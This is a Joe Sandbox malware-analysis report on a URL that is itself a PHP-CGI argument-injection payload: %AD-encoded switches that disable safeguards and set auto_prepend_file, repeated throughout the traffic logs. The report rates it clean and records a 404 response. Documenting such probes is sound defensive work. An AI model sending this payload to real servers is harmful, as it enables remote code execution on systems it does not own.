Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
http://62.96.227.70:80/php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp

Overview

General Information

Sample URL:http://62.96.227.70:80/php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp
Analysis ID:1523179
Infos:

Detection

Score:0
Range:0 - 100
Whitelisted:false
Confidence:80%

Signatures

Detected non-DNS traffic on DNS port

Classification

  • System is w10x64
  • chrome.exe (PID: 1368 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 3120 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 --field-trial-handle=1712,i,2063851336080282248,6247114304570441258,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6232 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://62.96.227.70:80/php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

There are no malicious signatures, click here to show all signatures.

Source: http://62.96.227.70/php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3DphpHTTP Parser: No favicon
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.4:59982 version: TLS 1.2
Source: global trafficTCP traffic: 192.168.2.4:59980 -> 1.1.1.1:53
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 62.96.227.70
Source: unknownTCP traffic detected without corresponding DNS query: 62.96.227.70
Source: unknownTCP traffic detected without corresponding DNS query: 62.96.227.70
Source: unknownTCP traffic detected without corresponding DNS query: 62.96.227.70
Source: unknownTCP traffic detected without corresponding DNS query: 62.96.227.70
Source: unknownTCP traffic detected without corresponding DNS query: 62.96.227.70
Source: unknownTCP traffic detected without corresponding DNS query: 62.96.227.70
Source: unknownTCP traffic detected without corresponding DNS query: 62.96.227.70
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 62.96.227.70
Source: unknownTCP traffic detected without corresponding DNS query: 62.96.227.70
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=K6e1fB3VC+yT2by&MD=XFT7N15t HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=K6e1fB3VC+yT2by&MD=XFT7N15t HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp HTTP/1.1Host: 62.96.227.70Connection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: 62.96.227.70Connection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://62.96.227.70/php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3DphpAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Tue, 01 Oct 2024 06:33:26 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Tue, 01 Oct 2024 06:33:26 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59982
Source: unknownNetwork traffic detected: HTTP traffic on port 59984 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59984
Source: unknownNetwork traffic detected: HTTP traffic on port 59982 -> 443
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.4:59982 version: TLS 1.2
Source: classification engineClassification label: clean0.win@21/4@2/4
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 --field-trial-handle=1712,i,2063851336080282248,6247114304570441258,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://62.96.227.70:80/php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 --field-trial-handle=1712,i,2063851336080282248,6247114304570441258,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath Interception1
Process Injection
1
Process Injection
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media3
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive4
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
www.google.com
172.217.16.132
truefalse
    unknown
    NameMaliciousAntivirus DetectionReputation
    http://62.96.227.70/favicon.icofalse
      unknown
      http://62.96.227.70/php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphpfalse
        unknown
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IPDomainCountryFlagASNASN NameMalicious
        62.96.227.70
        unknownUnited Kingdom
        8220COLTCOLTTechnologyServicesGroupLimitedGBfalse
        239.255.255.250
        unknownReserved
        unknownunknownfalse
        172.217.16.132
        www.google.comUnited States
        15169GOOGLEUSfalse
        IP
        192.168.2.4
        Joe Sandbox version:41.0.0 Charoite
        Analysis ID:1523179
        Start date and time:2024-10-01 08:33:13 +02:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 3m 6s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:browseurl.jbs
        Sample URL:http://62.96.227.70:80/php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Number of analysed new started processes analysed:8
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Detection:CLEAN
        Classification:clean0.win@21/4@2/4
        EGA Information:Failed
        HCA Information:
        • Successful, ratio: 100%
        • Number of executed functions: 0
        • Number of non-executed functions: 0
        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
        • Excluded IPs from analysis (whitelisted): 172.217.16.195, 172.217.16.142, 66.102.1.84, 34.104.35.123, 199.232.210.172, 192.229.221.95, 142.250.186.67
        • Excluded domains from analysis (whitelisted): fs.microsoft.com, clients2.google.com, ocsp.digicert.com, accounts.google.com, edgedl.me.gvt1.com, slscr.update.microsoft.com, update.googleapis.com, ctldl.windowsupdate.com, clientservices.googleapis.com, clients.l.google.com, fe3cr.delivery.mp.microsoft.com
        • Not all processes where analyzed, report is missing behavior information
        • Report size getting too big, too many NtSetInformationFile calls found.
        No simulations
        InputOutput
        URL: http://62.96.227.70/php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp Model: jbxai
        {
        "brand":[],
        "contains_trigger_text":false,
        "trigger_text":"",
        "prominent_button_name":"unknown",
        "text_input_field_labels":"unknown",
        "pdf_icon_visible":false,
        "has_visible_captcha":false,
        "has_urgent_text":false,
        "has_visible_qrcode":false}
        No context
        No context
        No context
        No context
        No context
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:HTML document, ASCII text, with CRLF line terminators
        Category:downloaded
        Size (bytes):1245
        Entropy (8bit):5.462849750105637
        Encrypted:false
        SSDEEP:24:hM0mIAvy4Wvsqs1Ra7JZRGNeHX+AYcvP2wk1RjdEF3qpMk5:lmIAq1UqsziJZ+eHX+AdP2TvpMk5
        MD5:5343C1A8B203C162A3BF3870D9F50FD4
        SHA1:04B5B886C20D88B57EEA6D8FF882624A4AC1E51D
        SHA-256:DC1D54DAB6EC8C00F70137927504E4F222C8395F10760B6BEECFCFA94E08249F
        SHA-512:E0F50ACB6061744E825A4051765CEBF23E8C489B55B190739409D8A79BB08DAC8F919247A4E5F65A015EA9C57D326BBEF7EA045163915129E01F316C4958D949
        Malicious:false
        Reputation:low
        URL:http://62.96.227.70/favicon.ico
        Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="http://www.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>..<title>404 - File or directory not found.</title>..<style type="text/css">.. ..body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px 10px 15px;} ..h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:1.7em;margin:0;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;..background-color:#555555;}..#content{margin:0 0 0 2%;position:relative;}...content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}..-->..</style>..</head>..<body>..<div id="header"><h1>Server Error</h1></div>..<div id="content">.. <div class="co
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:HTML document, ASCII text, with CRLF line terminators
        Category:downloaded
        Size (bytes):1245
        Entropy (8bit):5.462849750105637
        Encrypted:false
        SSDEEP:24:hM0mIAvy4Wvsqs1Ra7JZRGNeHX+AYcvP2wk1RjdEF3qpMk5:lmIAq1UqsziJZ+eHX+AdP2TvpMk5
        MD5:5343C1A8B203C162A3BF3870D9F50FD4
        SHA1:04B5B886C20D88B57EEA6D8FF882624A4AC1E51D
        SHA-256:DC1D54DAB6EC8C00F70137927504E4F222C8395F10760B6BEECFCFA94E08249F
        SHA-512:E0F50ACB6061744E825A4051765CEBF23E8C489B55B190739409D8A79BB08DAC8F919247A4E5F65A015EA9C57D326BBEF7EA045163915129E01F316C4958D949
        Malicious:false
        Reputation:low
        URL:http://62.96.227.70/php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp
